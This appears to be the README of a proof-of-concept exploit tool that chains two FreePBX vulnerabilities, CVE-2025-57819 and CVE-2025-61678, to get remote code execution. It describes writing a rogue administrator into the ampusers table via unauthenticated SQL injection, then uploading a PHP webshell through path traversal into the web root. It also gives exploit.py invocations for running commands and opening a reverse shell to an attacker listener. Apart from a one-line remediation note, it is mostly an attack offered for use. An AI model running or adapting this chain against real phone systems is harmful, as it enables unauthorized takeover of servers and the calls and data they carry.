
CVE-2025-57819-RCE_PoC
Summary: This guide demonstrates how to chain two vulnerabilities in FreePBX 16 (CVE-2025-57819 and CVE-2025-61678) to achieve a complete attack chain from unauthenticated access to Remote Code Execution (RCE).
| CVE ID | Affected Component | Impact & Vulnerability Type |
|---|---|---|
| CVE-2025-57819 | Endpoint module loader (brand parameter) | Unauthenticated stacked SQL injection |
| CVE-2025-61678 | Endpoint Manager firmware upload handler (fwbrand parameter) | Authenticated arbitrary file upload / Path Traversal |
Trigger the unauthenticated stacked SQL injection vulnerability through the Namespaced Endpoint Loader to directly write a brand-new administrator account with full privileges into the ampusers table.
Log in to the FreePBX admin panel using the newly created administrator credentials.
Abuse the firmware upload functionality of Endpoint Manager, combined with the path traversal vulnerability in the fwbrand parameter (../../../var/www/html/
), to write a PHP WebShell directly into the web root directory.Invoke the deployed WebShell to execute a single system command or establish an interactive reverse shell.
Affected versions: FreePBX 16 (Endpoint module versions below 16.0.92), FreePBX 17 (versions before 17.0.6).
Remediation: Update to the latest patched version as soon as possible.
# Execute a single command
python3 exploit.py --rhost pbx.example.com --command "id"
# Establish an interactive reverse shell (using pwntools to automatically listen)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444
# Use plain HTTP with a custom port
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"
| Parameter | Description |
|---|---|
| --rhost | [Required] Target host address |
| --rport | Target port (default: 443) |
| --http | Force HTTP instead of the default HTTPS |